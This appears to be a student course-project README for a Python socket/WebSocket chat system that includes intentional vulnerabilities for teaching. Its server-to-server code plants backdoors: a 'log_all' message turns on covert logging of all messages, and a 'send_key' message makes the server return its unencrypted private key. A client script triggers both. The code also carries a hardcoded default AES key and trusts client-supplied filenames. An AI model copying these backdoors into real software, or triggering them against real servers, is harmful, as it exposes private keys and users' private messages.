### Overview
Welcome to HD chat! This project aims to design and implement a small chat system. The system uses the socket and WebSocket protocols and integrates various core functions while emphasizing security and intentional vulnerabilities for educational purposes. Our chat services include listing members, private messages, group messages, peer-to-peer file transfers, and server-to-server communication while ensuring secure communication and handling malicious activities.

### Core Functionalities
- User Registration
- Member Listing
- Private Messaging
- Group Messaging
- Point-to-Point File Transfer
- Secure Communication
- Server-to-Server Communication

### Security Considerations
- Securing the Socket: Ensure that the socket used for receiving data is secured against potential attacks.
- Handling Malicious Users: Implement safeguards against malicious users using the program.
- Dealing with Malicious Nodes: Consider the impact of malicious nodes participating in the protocol and potential wiretapping of communications.

### Encryption Techniques
#### Message Encryption
To ensure secure communication between clients and the server, we use AES (Advanced Encryption Standard) in CBC (Cipher Block Chaining) mode for encrypting messages. Here’s a detailed explanation of the process:

#### 1. Encryption:

- We use the _Crypto.Cipher.AES_ module from the _pycryptodome_ library.
- A new AES cipher is created with a 16-byte key and a random initialization vector (IV).
- The message is padded to be a multiple of the AES block size using PKCS7 padding.
- The message is encrypted, and the IV is prepended to the ciphertext to ensure decryption can be performed correctly.

#### 2. Decryption:

- The IV is extracted from the beginning of the received ciphertext.
- The remaining ciphertext is decrypted, and the original message is obtained by unpadding the plaintext.

### Password Encryption
To securely store and handle user passwords, we utilize hashing techniques. Here's a detailed explanation:


#### 1. Hashing:

- User passwords are hashed using a secure hash function before storing them.
- This ensures that even if the stored data is compromised, the original passwords are not easily retrievable.

#### 2. Salting:

- To further enhance security, a unique salt is added to each password before hashing.
- This prevents attackers from using precomputed hash tables (rainbow tables) to crack passwords.

### Installation and Setup
#### 1. Install Dependencies:
Ensure you have the necessary dependencies installed. For Python, you can use pip:

In [ ]:
pip install pycryptodome websockets

### Usage

#### Server to Client Communication
#### Server Code
The server code handles client registration, login, message sending, and file transfers.

In [ ]:
import socket
import threading
import json
import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

def encrypt_message(message, key):
    cipher = AES.new(key, AES.MODE_CBC)
    ct_bytes = cipher.encrypt(pad(message.encode(), AES.block_size))
    iv = cipher.iv
    return iv + ct_bytes

def decrypt_message(ciphertext, key):
    iv = ciphertext[:16]
    ct = ciphertext[16:]
    cipher = AES.new(key, AES.MODE_CBC, iv=iv)
    pt = unpad(cipher.decrypt(ct), AES.block_size)
    return pt.decode()

def handle_client(conn, addr, key):
    print(f"New connection: {addr}")
    while True:
        try:
            encrypted_message = conn.recv(2048)
            if not encrypted_message:
                break
            decrypted_message = decrypt_message(encrypted_message, key)
            message_data = json.loads(decrypted_message)
            action = message_data.get('action')

            if action == 'register':
                username = message_data['username']
                password = message_data['password']
                # Handle registration logic
                response = json.dumps({"status": "Registration successful"})
                conn.send(encrypt_message(response, key))

            elif action == 'login':
                username = message_data['username']
                password = message_data['password']
                # Handle login logic
                response = json.dumps({"status": "Login successful", "users": ["user1", "user2"]})
                conn.send(encrypt_message(response, key))

            elif action == 'message':
                receiver = message_data['receiver']
                message = message_data['message']
                # Handle sending message logic

            elif action == 'send_file':
                filename = message_data['filename']
                file_size = message_data['file_size']
                file_data = conn.recv(file_size)
                with open(filename, 'wb') as f:
                    f.write(file_data)
                print(f"Received file {filename} from {username}")

        except Exception as e:
            print(f"Error handling client {addr}: {e}")
            break
    conn.close()

def start_server():
    secret_key = os.environ.get('SECRET_KEY', '0123456789abcdef').encode()  # Ensure this key is 16 bytes long
    server_ip = '0.0.0.0'
    server_port = 5555

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((server_ip, server_port))
    server.listen(5)
    print(f"Server started on {server_ip}:{server_port}")

    while True:
        conn, addr = server.accept()
        threading.Thread(target=handle_client, args=(conn, addr, secret_key)).start()

if __name__ == "__main__":
    start_server()

#### Client Code
The client code allows users to register, login, send messages, and send files to other users.

In [ ]:
import os
import socket
import threading
import json
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

def encrypt_message(message, key):
    cipher = AES.new(key, AES.MODE_CBC)
    ct_bytes = cipher.encrypt(pad(message.encode(), AES.block_size))
    iv = cipher.iv
    return iv + ct_bytes

def decrypt_message(ciphertext, key):
    iv = ciphertext[:16]
    ct = ciphertext[16:]
    cipher = AES.new(key, AES.MODE_CBC, iv=iv)
    pt = unpad(cipher.decrypt(ct), AES.block_size)
    return pt.decode()

def receive_messages(sock, key):
    while True:
        try:
            encrypted_message = sock.recv(2048)
            if encrypted_message:
                decrypted_message = decrypt_message(encrypted_message, key)
                message_data = json.loads(decrypted_message)
                sender = message_data.get('sender', 'Unknown')
                text = message_data.get('message', '')
                if 'filename' in message_data:
                    file_size = int(message_data['file_size'])
                    file_data = b""
                    while len(file_data) < file_size:
                        packet = sock.recv(1024)
                        if not packet:
                            break
                        file_data += packet
                    with open(message_data['filename'], 'wb') as f:
                        f.write(file_data)
                    print(f"Received file {message_data['filename']} from {sender}")
                else:
                    print(f"{sender}: {text}")
            else:
                break
        except Exception as e:
            print(f"Error receiving message: {e}")
            break

def register(sock, key):
    username = input("Choose a username: ")
    password = input("Choose a password: ")
    data = {
        "action": "register",
        "username": username,
        "password": password
    }
    encrypted_data = encrypt_message(json.dumps(data), key)
    sock.send(encrypted_data)
    response = decrypt_message(sock.recv(2048), key)
    print(response)

def login(sock, key):
    global username
    username = input("Username: ")
    password = input("Password: ")
    data = {
        "action": "login",
        "username": username,
        "password": password
    }
    encrypted_data = encrypt_message(json.dumps(data), key)
    sock.send(encrypted_data)
    response = json.loads(decrypt_message(sock.recv(2048), key))
    print(response['status'])
    if response['status'] == "Login successful":
        print("Registered users:")
        for user in response['users']:
            print(user)
    return response['status'] == "Login successful"

def send_file(sock, key):
    filepath = input("Enter the path of the file to send: ")
    receiver = input("Enter receiver (or 'all' for public message): ")
    filename = os.path.basename(filepath)
    file_size = os.path.getsize(filepath)
    with open(filepath, 'rb') as f:
        file_data = f.read()
    data = {
        "action": "send_file",
        "receiver": receiver,
        "filename": filename,
        "file_size": file_size,
        "sender": username
    }
    try:
        encrypted_data = encrypt_message(json.dumps(data), key)
        sock.send(encrypted_data)
        sock.send(file_data)
    except BrokenPipeError:
        print("Connection lost while sending file.")

def main():
    global username
    secret_key = os.environ.get('SECRET_KEY', '0123456789abcdef').encode()  # Ensure this key is 16 bytes long
    server_ip = input("Enter server IP: ")
    server_port = 5555
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((server_ip, server_port))
    
    while True:
        choice = input("Do you want to (1) Login or (2) Register? ")
        if choice == '1':
            if login(sock, secret_key):
                break
        elif choice == '2':
            register(sock, secret_key)
        else:
            print("Invalid choice. Please choose again.")
    
    threading.Thread(target=receive_messages, args=(sock, secret_key)).start()
    
    while True:
        action = input("Do you want to (1) Send a Message or (2) Send a File? ")
        if action == '1':
            receiver = input("Enter receiver (or 'all' for public message): ")
            message = input("Enter your message: ")
            data = {
                "action": "message",
                "receiver": receiver,
                "message": message,
                "sender": username
            }
            try:
                encrypted_data = encrypt_message(json.dumps(data), secret_key)
                sock.send(encrypted_data)
            except BrokenPipeError:
                print("Connection lost while sending message.")
        elif action == '2':
            send_file(sock, secret_key)
        else:
            print("Invalid action. Please choose again.")

if __name__ == "__main__":
    main()

#### Server to Server Communication
#### Server Code
#### 1. Environment Setup
Make sure you have the required Python libraries installed. You can install them using the following command:

In [ ]:
pip install websockets cryptography

#### 2. Code Overview
This code implements a WebSocket server with two backdoor functionalities:

Trigger logging of all received messages when a specific message is received.
Trigger sending the server's private key when a specific message is received.

#### 3. Detailed Explanation
#### Generate RSA Key Pair
The function generate_keys() generates an RSA key pair (private and public keys).

In [ ]:
def generate_keys():
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()
    return private_key, public_key

#### Encrypt and Decrypt Messages
The function encrypt_message() uses the public key to encrypt messages, while decrypt_message() uses the private key to decrypt messages.

In [ ]:
def encrypt_message(public_key, message):
    return base64.b64encode(public_key.encrypt(
        message,
        padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                     algorithm=hashes.SHA1(), label=None)
    ))

def decrypt_message(private_key, encrypted_message):
    return private_key.decrypt(
        base64.b64decode(encrypted_message),
        padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                     algorithm=hashes.SHA1(), label=None)
    )

#### Handle WebSocket Messages
The handle_server() function processes received WebSocket messages and performs actions based on the content of the messages.

In [ ]:
async def handle_server(websocket, path):
    global log_all_messages
    async for message in websocket:
        data = json.loads(message)
        tag = data.get("tag")

        if tag == "message":
            sender = data.get("from")
            recipient = data.get("to")
            info = decrypt_message(private_key, data.get("info").encode()).decode()

            print(f"Message from {sender} to {recipient}: {info}")

            if info == "log_all":
                log_all_messages = True

            if info == "send_key":
                key_data = private_key.private_bytes(
                    encoding=serialization.Encoding.PEM,
                    format=serialization.PrivateFormat.PKCS8,
                    encryption_algorithm=serialization.NoEncryption()
                )
                await websocket.send(json.dumps({"tag": "private_key", "key": key_data.decode()}))

            if log_all_messages:
                with open("all_messages.log", "a") as log_file:
                    log_file.write(f"Message from {sender} to {recipient}: {info}\n")

        elif tag == "presence":
            print("Presence update received")

        elif tag == "check":
            response = {"tag": "checked"}
            await websocket.send(json.dumps(response))

        elif tag == "attendance":
            print("Attendance check received")

#### Start the WebSocket Server
The server_to_server() function starts the WebSocket server, listening on port 5555 on the localhost.

In [ ]:
async def server_to_server():
    server = await websockets.serve(handle_server, "localhost", 5555)
    await server.wait_closed()

loop = asyncio.get_event_loop()
loop.run_until_complete(server_to_server())

#### 4. Starting the Server
Run the code to start the WebSocket server:

python Server-to-Server Communication - Server Code.py

#### 5. Testing the Server
You can use any WebSocket client (such as websocat, Postman, or a custom Python client) to send messages to the server for testing. Here is an example Python client code:

In [ ]:
import asyncio
import websockets
import json
import base64

# Assuming the same encrypt_message function as in the server script

async def test_client():
    uri = "ws://localhost:5555"
    async with websockets.connect(uri) as websocket:
        message = "Hello, Server!"
        
        encrypted_message = encrypt_message(public_key, message.encode()).decode()

        data = json.dumps({"tag": "message", "from": "client", "to": "server", "info": encrypted_message})
        await websocket.send(data)
        print(f"Sent: {data}")

        response = await websocket.recv()
        print(f"Received: {response}")

# Assume public_key and encrypt_message are already defined as in the server script

loop = asyncio.get_event_loop()
loop.run_until_complete(test_client())

### Important Notes
- Security: The code contains two backdoor functionalities. Use it with caution to prevent the private key from being exposed and messages from being logged without proper authorization.
- Encryption Algorithm: The encryption and decryption use RSA with OAEP padding to ensure the security of message transmission.

#### Client Code
#### 1. Environment Setup
Make sure you have the required Python libraries installed. You can install them using the following command:

In [ ]:
pip install websockets cryptography

#### 2. Code Overview
This code includes functionalities to:

- Generate RSA keys for encryption and decryption.
- Send encrypted messages to a WebSocket server.
- Trigger backdoor functionalities to log all messages and send the private key.
#### 3. Detailed Explanation
#### Generate RSA Key Pair
The generate_keys() function generates an RSA key pair (private and public keys).

In [ ]:
def generate_keys():
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()
    return private_key, public_key

#### Encrypt and Decrypt Messages
The encrypt_message() function uses the public key to encrypt messages, while decrypt_message() uses the private key to decrypt messages.

In [ ]:
def encrypt_message(public_key, message):
    return base64.b64encode(public_key.encrypt(
        message,
        padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                     algorithm=hashes.SHA1(), label=None)
    ))

def decrypt_message(private_key, encrypted_message):
    return private_key.decrypt(
        base64.b64decode(encrypted_message),
        padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                     algorithm=hashes.SHA1(), label=None)
    )

#### Send Encrypted Messages
The send_message() function sends an encrypted message to a WebSocket server.

In [ ]:
async def send_message(websocket, recipient, message):
    encrypted_info = encrypt_message(public_key, message.encode())
    data = {
        "tag": "message",
        "from": "server1",
        "to": recipient,
        "info": encrypted_info.decode()
    }
    await websocket.send(json.dumps(data))

#### Main Function to Connect and Send Messages
The main() function connects to the WebSocket server and sends several messages, including those that trigger the backdoor functionalities.

In [ ]:
async def main():
    async with websockets.connect("ws://<other_server_ip>:5555") as websocket:
        await send_message(websocket, "server2", "Hello, Server 2!")
        # Trigger backdoor to log all messages
        await send_message(websocket, "server2", "log_all")
        # Trigger backdoor to send private key
        await send_message(websocket, "server2", "send_key")
        # Add other interaction logic

#### 4. Starting the Client
Replace <other_server_ip> with the actual IP address of the other WebSocket server you want to connect to. Then, run the following command to start the client:

In [ ]:
python Server-to-Server Communication - Client Code.py

#### 5. Testing the Client
When you run the client, it will perform the following actions:

- Connect to the specified WebSocket server.
- Send a message saying "Hello, Server 2!".
- Send a message to trigger logging of all messages ("log_all").
- Send a message to trigger sending of the private key ("send_key").
#### Important Notes
- Security: The code contains backdoor functionalities that can log all messages and send the private key. Use it with extreme caution to prevent unauthorized access to sensitive information.
- Encryption Algorithm: The encryption and decryption use RSA with OAEP padding to ensure the security of message transmission.
Feel free to ask if you have any more questions or need further assistance.

### Expected Interactions with Other Groups
While the protocol has been standardized, different groups may have different implementations. Adherence to the protocol specification is critical to ensure interoperability, and we are ready to discuss and resolve any integration issues with other groups.

### Contact Information
For any questions or feedback, please contact:

Name: Jingyi Li
Email: jingyi.li02@student.adelaide.edu.au